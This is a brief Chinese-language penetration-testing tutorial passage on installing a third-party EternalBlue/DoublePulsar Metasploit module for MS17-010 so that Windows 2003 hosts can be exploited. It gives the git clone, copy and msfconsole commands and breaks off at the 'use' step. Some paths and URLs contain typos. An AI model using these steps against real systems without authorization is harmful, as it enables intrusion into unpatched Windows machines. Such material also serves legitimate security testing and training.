MS17-010的漏洞利用模块Metasploit虽然已经集成,但是经过测试后发现不支持渗透Windows 2003系统,但是网络上基本有支持的渗透脚本。起github下载地址为htps://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/。
首先讲该漏洞利用模块克隆到本地文件夹,接着将eternalblue_doubluepulsar-Metasploit文件下eternalblue_doublepulsar.rb 复制到 /user/share/metasploit-framework/modules/exploits/windows/smb 下。
git clone htps://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/
cp -r deps/ eternalblue_doublepulsar.rb /user/share/metasploit-framework/modules/exploits/windows/smb
接着,加载msfconsole,然后搜索该脚本,输入use命令加载该模块。
msfconsole
search eternalblue
use exploit/window